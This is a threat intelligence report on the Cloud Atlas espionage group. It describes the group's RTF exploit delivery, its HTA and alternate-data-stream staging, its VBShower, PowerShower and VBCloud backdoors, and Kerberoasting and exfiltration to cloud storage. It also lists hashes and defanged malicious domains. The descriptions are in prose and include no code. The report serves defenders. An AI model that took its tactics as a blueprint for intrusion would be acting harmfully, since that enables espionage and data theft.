Evolving Techniques in Cloud Atlas Cyber Attacks

Threat Group: Cloud Atlas (also known as Inception)
Threat Type: Advanced Persistent Threat (APT)
Exploited Vulnerabilities:

• CVE-2017-11882: Memory corruption in Microsoft Office.
• CVE-2018-0802: Formula editor vulnerability in Microsoft Office exploited via malicious RTF files.

Malware Used:

• VBShower: Polymorphic VBS-based backdoor.
• PowerShower: PowerShell-based malware for reconnaissance and lateral movement.
• VBCloud: New backdoor using public cloud services as C2 infrastructure.

Threat Score: High (8.8/10) – Sophisticated attack methods, persistent campaigns, and effective evasion tactics.
Last Observed Activity: December 24, 2024 – Cloud Atlas launched new campaigns employing VBCloud to steal data from organizations in Russia and neighboring countries.

Overview

Cloud Atlas, also known as Inception, has been a significant actor in the realm of cyber-espionage since its identification in 2014. Targeting a diverse range of sectors, including government agencies, aerospace industries, and research institutions, the group primarily operates across Eastern Europe, Central Asia, and increasingly in Russia. The group's operations are marked by persistent, sophisticated attack methodologies that evolve over time to stay ahead of detection systems. Its campaigns predominantly employ spear-phishing techniques to gain initial access, often leveraging malicious RTF documents exploiting vulnerabilities like CVE-2018-0802. These documents download HTML applications (HTAs) that initiate a multi-layered infection chain. Notably, recent attacks have expanded their scope to target agro-industrial enterprises and research entities, reflecting a strategic pivot to encompass a broader array of critical sectors.

The hallmark of Cloud Atlas’ operations lies in its layered approach to infection, obfuscation, and data exfiltration. The group has recently integrated the VBCloud backdoor into its arsenal, supplementing its well-documented VBShower and PowerShower malware. This new tool uses public cloud services for command-and-control (C2) infrastructure, enhancing its operational stealth and adaptability. VBCloud facilitates data collection, network reconnaissance, and file exfiltration with unprecedented efficiency, leveraging encrypted data streams and exploiting NTFS alternate data streams (ADS) for covert file storage. The combination of VBShower’s polymorphic capabilities, PowerShower’s reconnaissance scripts, and VBCloud’s reliance on public cloud storage underscores Cloud Atlas’ commitment to maintaining persistence and operational flexibility. This sophistication demands heightened vigilance and an adaptive defense posture from targeted organizations.

Key Details

Delivery Method:

• Spear-phishing emails with malicious RTF attachments exploiting vulnerabilities like CVE-2018-0802.

Targeted Entities:

• Government agencies.
• Aerospace and defense industries.
• Research institutions.
• Recently, agro-industrial enterprises in Russia.

Notable Functions:

• Data exfiltration via WebDAV protocols.
• Reconnaissance and credential harvesting.
• Installation of multiple backdoors for extended operations.

Obfuscation Techniques:

• Polymorphic HTML applications (HTA).
• Usage of alternate data streams (NTFS ADS) for file storage and script execution.

Attack Vectors

Cloud Atlas employs a highly intricate infection chain, making its campaigns challenging to detect and mitigate. Each phase of the attack is designed for precision targeting, persistence, and effective data exfiltration:

1. Initial Infection:
   • The group primarily uses spear-phishing emails containing malicious RTF attachments that exploit CVE-2018-0802. These attachments are crafted to download and execute an HTML Application (HTA) file from a remote command-and-control (C2) server.
   • To evade broad detection, the payload’s activation is restricted to specific time slots and victim IP addresses, ensuring precision targeting.
2. HTA Execution and File Deployment:
   • The downloaded HTA file leverages NTFS alternate data streams (ADS) to store encrypted components of the VBShower malware.
   • The HTA file creates unique script and registry entries for each victim, allowing for individualized infection profiles and further complicating detection.
3. VBShower Operations:
   • Once installed, VBShower decrypts and executes its backdoor payloads.
   • It actively monitors and restores critical registry keys to ensure persistence. Additionally, it downloads encrypted scripts and modules from the C2 server to execute advanced payloads.
4. PowerShower Reconnaissance:
   • PowerShower, a PowerShell-based component, conducts extensive reconnaissance on the victim’s local network.
   • Tasks include enumerating domain members, identifying administrator groups, and launching dictionary-based password attacks to gain deeper network access.
5. VBCloud Deployment:
   • VBCloud, introduced in 2024, enhances Cloud Atlas’ capabilities by using public cloud services such as Yandex Disk and MyDrive for its C2 infrastructure.
   • The backdoor collects sensitive information, including files and system metadata, and exfiltrates them in encrypted form. VBCloud is also capable of uploading and executing additional payloads on infected systems.
6. Payload Execution and Data Exfiltration:
   • Secondary payloads, often leveraging PowerShell, focus on high-value tasks such as Kerberoasting attacks, file harvesting, and ZIP-based data exfiltration.
   • Files of interest (e.g., DOC, XLS, PDF) are compressed, encrypted, and uploaded to cloud-based C2 servers. Upon successful upload, traces are deleted from the victim’s system to minimize detection.

This meticulous and multi-faceted approach underscores Cloud Atlas’ sophistication, emphasizing the importance of advanced detection mechanisms and proactive defense strategies.

Indicators of Compromise (IoCs)

File Hashes (MD5)

• 0139f32a523d453bc338a67ca45c224d
• 016b6a035b44c1ad10d070abcdfe2f66
• 01db58a1d0ec85adc13290a6290ad9d6
• 0f37e1298e4c82098dc9318c7e65f9d2
• 15fd46ac775a30b1963281a037a771b1
• 160a65e830eb97aae6e1305019213558
• 184cf8660af7538cd1cd2559a10b6622
• 1af1f9434e4623b7046cf6360e0a520e
• 1bfb9cba8aa23a401925d356b2f6e7ed
• 21585d5881cc11ed1f615fdb2d7acc11
• 242e86e658fe6ab6e4c81b68162b3001
• 2d24044c0a5b9ebe4e01ded2bfc2b3a4
• 2fe7e75bc599b1c68b87cf2a3e7aa51f
• 31b01387ca60a1771349653a3c6ad8ca
• 36dd0fbd19899f0b23ade5a1de3c2fec
• 389bc3b9417d893f3324221141edea00
• 389f6e6fd9dcc84c6e944dc387087a56
• 3a54acd967dd104522ba7d66f4d86544
• 3f12bf4a8d82654861b5b5993c012bfa
• 49f8ed13a8a13799a34cc999b195bf16
• 4b96dc735b622a94d3c74c0be9858853
• 6fcee9878216019c8dfa887075c5e68e
• 88be01f8c4a9f335d33fa7c384ca4666
• 9d3557cc5c444fe5d73e4c7fe1872414
• a30319545fda9e2da0532746c09130eb
• aa8da99d5623fafed356a14e59acbb90
• cba05e11cb9d1d71f0fa70ecd1af2480
• cbfb691e95ee34a324f94ed1ff91bc23
• d445d443ace329fb244edc3e5146313b
• f3f28018fb5108b516d802a038f90bde
• f45008bf1889a8655d32a0eb93b8acdd

Domains

• content-protect[.]net
• control-issue[.]net
• gosportal[.]net
• mirconnect[.]info
• net-plugin[.]org
• office-confirm[.]com
• riamir[.]net
• sber-cloud[.]info
• triger-working[.]com
• web-privacy[.]net
• web-wathapp[.]com
• yandesks[.]net
• yandesktop[.]com
• yandisk[.]info

Hostnames

• kim[.]nl[.]tab[.]digital
• webdav[.]mydrive[.]ch

Mitigation and Prevention

1. Email Filtering:
   • Deploy advanced filtering solutions to block malicious RTF files and suspicious links.
2. Endpoint Protection:
   • Use robust antivirus software capable of detecting polymorphic malware.
3. Patch Management:
   • Regularly update software, especially Microsoft Office, to mitigate known vulnerabilities.
4. User Awareness Training:
   • Educate employees on recognizing phishing attempts and handling suspicious emails.
5. Network Monitoring:
   • Implement monitoring tools to detect unusual data transfers to cloud storage services.
6. PowerShell Restrictions:
   • Limit the execution of PowerShell scripts on endpoints to reduce exploitation risk.

Risk Assessment

Cloud Atlas campaigns highlight the evolving threat landscape, particularly for organizations in Eastern Europe. The use of public cloud storage for C2 communication and the integration of new backdoors like VBCloud indicate a shift towards more covert operations. The reliance on phishing underscores the need for robust human and technical defenses.

Conclusion

Cloud Atlas continues to refine its operations with new tools like VBCloud, expanding its capability to collect and exfiltrate sensitive data. Organizations in targeted regions must enhance their defenses and adopt a proactive approach to threat detection and response.

Sources:

• Securelist – Recent Cloud Atlas activity
• Trend Micro - Cloud Atlas Group Updates Infection Chain With Polymorphic Malware to Evade Detection
• The Record – Cloud Atlas targets Russian orgs with phishing campaigns
• AlienVault - Indicators of Compromise (IoCs)